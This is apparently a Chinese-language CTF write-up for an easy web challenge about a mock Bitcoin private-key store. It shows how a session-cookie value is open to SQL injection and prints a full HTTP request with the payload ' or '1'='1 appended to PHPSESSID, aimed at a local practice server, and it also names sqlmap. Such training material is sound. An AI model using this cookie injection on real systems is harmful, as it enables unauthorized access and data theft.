### 1.题目名称

Bitcoin private-key system



### 2.题目类型

web(easy)



### 3.题目描述

暗网刚刚启用了一个比特币私钥存储系统，尝试入侵并获取管理员的私钥。



### 4.考察知识点

基于cookie的sql注入



### 5.解题思路

通过简单的测试后，猜测COOKIE中的session_id字段存在sql注入，可以使用sqlmap注入得到结果，或者直接修改请求包：

```
GET /index.php HTTP/1.1
Host: 127.0.0.1:8004
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,pl;q=0.6
Cookie: piclist=; PHPSESSID=qumofaj5cjgljuetdfbr2gdb35' or '1'='1
Connection: close
```

可以发现返回的flag在html页面中







